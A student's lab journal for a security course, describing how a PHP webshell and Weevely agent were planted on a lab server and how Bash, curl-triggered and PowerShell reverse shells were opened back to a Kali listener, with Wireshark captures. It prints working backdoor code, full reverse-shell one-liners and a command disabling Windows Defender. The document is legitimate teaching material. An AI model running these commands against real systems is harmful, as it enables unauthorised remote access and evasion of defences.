SEC335 - Technical Journal

Class Activity 8.1 - Weevely & Reverse Shells

📌 Overview

In this lab, we explored Weevely, a PHP-based webshell that allows command execution on a remote server. The goal was to upload a backdoor to the Pippen server, establish a connection, and analyze traffic using Wireshark.

---

🔧 Steps Performed

Step 1: Uploading the Webshell

1. SSH into Pippen

   ssh [email protected]
   

2. Create a simple PHP backdoor:

   echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
   chmod 755 /var/www/html/shell.php
   

3. Restart Apache to ensure the file is accessible:

   systemctl restart httpd
   

Step 2: Establishing a Weevely Connection

1. Generate a Weevely agent on Kali:

   weevely generate strongpassword weevely.php
   

2. Upload the weevely.php to the target server.
3. Connect using Weevely:

   weevely http://10.0.5.25/weevely.php strongpassword
   

4. Verify connection:

   whoami
   pwd
   

Step 3: Capturing Traffic with Wireshark

1. Open Wireshark.
2. Apply a display filter:

   http.request.method == "GET"
   

3. Capture the request when executing a command like whoami.

Challenges Faced & Solutions

• Weevely session failed → Fixed by ensuring correct permissions & using chmod 755.
• No response from shell.php → Resolved by restarting Apache (systemctl restart httpd).

📸 Screenshots Captured:

• Wireshark traffic capture.

---

Class Activity 8.2 - Reverse Shells

📌 Overview

This lab focused on various reverse shell techniques, including Bash, Netcat, Python, and PowerShell reverse shells, and capturing them using Wireshark.

---

🔧 Steps Performed

Step 1: Bash Reverse Shell on Linux

1. Identify Kali’s IP:

   ip a | grep eth0
   

   Example output: 10.0.17.45
2. Setup a Netcat Listener on Kali:

   nc -lnvp 4449
   

3. Execute Reverse Shell from Target (Rocky Linux):

   bash -i >& /dev/tcp/10.0.17.45/4449 0>&1
   

4. Confirm access:

   whoami
   

Step 2: Reverse Shell on Pippen

1. Upload backdoor to Pippen:

   echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/revshell.php
   chmod 755 /var/www/html/revshell.php
   

2. Invoke reverse shell using curl:

   curl "http://10.0.5.25/revshell.php?cmd=bash -i >& /dev/tcp/10.0.17.45/4449 0>&1"
   

Step 3: PowerShell Reverse Shell on Windows

1. Disable Windows Defender:

   Set-MpPreference -DisableRealtimeMonitoring $true
   

2. Setup a Netcat Listener on Kali:

   nc -lnvp 4449
   

3. Run PowerShell Reverse Shell:

   powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.45',4449); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
   

4. Confirm connection:

   whoami
   

Step 4: Capturing Traffic in Wireshark

1. Set Wireshark filter:

   tcp.port == 4449
   

2. Capture a command execution (whoami).

Challenges Faced & Solutions

• PowerShell blocked execution → Disabled AV using Set-MpPreference -DisableRealtimeMonitoring $true.
• Netcat not found on Pippen → Used a Bash reverse shell instead.

📸 Screenshots Captured:

• Successful reverse shell on Kali.

• Wireshark TCP stream capture.

---

Reflections & Learnings

• The importance of privilege escalation in post-exploitation.
• How defensive security tools (e.g., Windows Defender) block attacks.
• Real-world network traffic analysis using Wireshark.

---